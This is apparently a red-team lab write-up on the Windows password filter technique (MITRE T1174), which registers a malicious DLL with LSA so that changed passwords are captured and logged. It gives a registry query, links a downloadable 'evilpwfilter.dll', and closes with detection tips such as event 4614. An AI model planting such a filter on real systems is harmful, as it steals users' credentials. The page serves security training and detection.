T1174: Password Filter

Credential Access

This lab explores a native OS notification of when the user account password gets changed, which is responsible for validating it. That, of course means, that the password can be intercepted and logged.

Execution

Password filters are registered in registry and we can see them here:

attacker@victim
reg query "hklm\system\currentcontrolset\control\lsa" /v "notification packages"

Or via regedit:

Building an evil filter DLL based on a great article by mubix. He has also kindly provided the code to use, which I modified slightly to make sure that the critical DLL functions were exported correctly in order for this technique to work, since mubix's code did not work for me out of the box. I also had to change the logging statements in order to rectify a couple of compiler issues:

59KB
evilpwfilter.dll
Open
Password Filter DLL

Injecting the evil password filter into the victim system:

Testing password changes after the reboot - note how the password changes are getting logged:

Observations

Windows event 4614 notifies about new packages loaded by the SAM:

Logging command line can also help in detecting this activity:

...especially, if the package has just been recently dropped to disk:

Also, it may be worth considering checking new DLLs dropped to %systemroot%\system32 for exported PasswordChangeNotifyfunction:

References

LogoStealing passwords every time they changecarnal0wnage.attackresearch.com
LogoModify Authentication Process: Password Filter DLL, Sub-technique T1556.002 - Enterprise | MITRE ATT&CK®attack.mitre.org
PreviousT1214: Credentials in RegistryNextForcing WDigest to Store Credentials in Plaintext

Last updated

Was this helpful?